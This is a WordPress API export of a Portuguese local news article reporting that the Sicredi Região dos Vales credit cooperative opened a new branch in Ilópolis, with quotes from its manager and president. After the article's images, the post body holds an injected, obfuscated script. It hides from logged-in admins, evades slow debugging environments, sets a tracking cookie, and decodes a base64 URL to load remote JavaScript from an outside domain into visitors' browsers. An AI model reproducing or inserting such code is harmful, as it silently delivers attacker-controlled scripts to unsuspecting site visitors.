{"id":3815,"date":"2025-07-28T16:35:48","date_gmt":"2025-07-28T16:35:48","guid":{"rendered":"https:\/\/www.jornalnotiserra.com.br\/?p=3815"},"modified":"2026-04-04T18:04:35","modified_gmt":"2026-04-04T18:04:35","slug":"sicredi-regiao-dos-vales-inaugura-nova-agencia-em-ilopolis","status":"publish","type":"post","link":"https:\/\/www.jornalnotiserra.com.br\/index.php\/2025\/07\/28\/sicredi-regiao-dos-vales-inaugura-nova-agencia-em-ilopolis\/","title":{"rendered":"Sicredi Regi\u00e3o dos Vales inaugura nova ag\u00eancia em Il\u00f3polis"},"content":{"rendered":"<p style=\"text-align: center;\"><em>A iniciativa reafirma o compromisso da Cooperativa de Cr\u00e9dito com o desenvolvimento local, fortalecendo o relacionamento pr\u00f3ximo com os associados e a parceria com a comunidade<\/em><\/p>\n<p>A comunidade de Il\u00f3polis conta com uma nova ag\u00eancia do Sicredi Regi\u00e3o dos Vales, inaugurada nesta segunda-feira, 28 de julho. O espa\u00e7o foi projetado com um conceito moderno, oferecendo aos associados um ambiente acolhedor, seguro e confort\u00e1vel e proporcionando maior privacidade no atendimento.<\/p>\n<p>Localizada na Rua Expedicion\u00e1rios, n\u00ba 705, no Centro de Il\u00f3polis, a ag\u00eancia foi projetada para proporcionar uma experi\u00eancia ainda mais acolhedora e personalizada. A iniciativa reafirma a forma de atua\u00e7\u00e3o do Sicredi Regi\u00e3o dos Vales, valorizando o relacionamento e atendimento pr\u00f3ximo.<\/p>\n<p>Segundo o gerente da ag\u00eancia, Elizandro Coser, 2025 representa um marco importante para o Sicredi de Il\u00f3polis, com a celebra\u00e7\u00e3o dos 29 anos de atua\u00e7\u00e3o junto \u00e0 comunidade e a inaugura\u00e7\u00e3o da nova ag\u00eancia. <em>\u201cEstamos entregando \u00e0 comunidade uma nova e moderna estrutura, com maior privacidade e conforto, gra\u00e7as ao trabalho desenvolvido e a confian\u00e7a e parceria constru\u00edda junto aos nossos associados. Esse investimento que o Sicredi realizou, refor\u00e7a o nosso compromisso de acreditar e reinvestir em nosso munic\u00edpio, contribuindo para que tenhamos uma cidade mais bela e um lugar cada vez melhor para viver.\u201d <\/em><\/p>\n<p>Conforme o Presidente do Sicredi Regi\u00e3o dos Vales, Ricardo C\u00e9, este \u00e9 um momento importante e significativo para a Cooperativa de Cr\u00e9dito, para os associados e para a comunidade de Il\u00f3polis. <em>\u201cEsta nova ag\u00eancia fortalece ainda mais a nossa parceria com o munic\u00edpio e com os associados, reafirmando o nosso compromisso com o desenvolvimento local. A entrega de uma estrutura moderna e acolhedora para a comunidade de Il\u00f3polis refor\u00e7a nossa forma de atua\u00e7\u00e3o, proporcionando aos associados um ambiente confort\u00e1vel, seguro e alinhado \u00e0s suas necessidades.\u201d<\/em><\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-3817\" src=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Equipe-de-colaboradores-do-Sicredi-de-Ilopolis-em-frente-a-nova-agencia--150x150.jpeg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Equipe-de-colaboradores-do-Sicredi-de-Ilopolis-em-frente-a-nova-agencia--150x150.jpeg 150w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Equipe-de-colaboradores-do-Sicredi-de-Ilopolis-em-frente-a-nova-agencia--300x300.jpeg 300w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Equipe-de-colaboradores-do-Sicredi-de-Ilopolis-em-frente-a-nova-agencia--100x100.jpeg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/> <img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-3818\" src=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Ambientes-da-nova-agencia-de-Ilopolis-site-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Ambientes-da-nova-agencia-de-Ilopolis-site-150x150.jpg 150w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Ambientes-da-nova-agencia-de-Ilopolis-site-300x300.jpg 300w, https:\/\/www.jornalnotiserra.com.br\/wp-content\/uploads\/2025\/07\/Ambientes-da-nova-agencia-de-Ilopolis-site-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A iniciativa reafirma o compromisso da Cooperativa de Cr\u00e9dito com o desenvolvimento local, fortalecendo o relacionamento pr\u00f3ximo com os associados e a parceria com a comunidade A comunidade de Il\u00f3polis conta com uma nova ag\u00eancia do Sicredi Regi\u00e3o dos Vales, inaugurada nesta segunda-feira, 28 de julho. O espa\u00e7o foi projetado com um conceito moderno, oferecendo&#8230;<\/p>\n","protected":false},"author":7,"featured_media":3816,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[48],"tags":[],"_links":{"self":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3815"}],"collection":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3815"}],"version-history":[{"count":1,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3815\/revisions"}],"predecessor-version":[{"id":3819,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3815\/revisions\/3819"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media\/3816"}],"wp:attachment":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}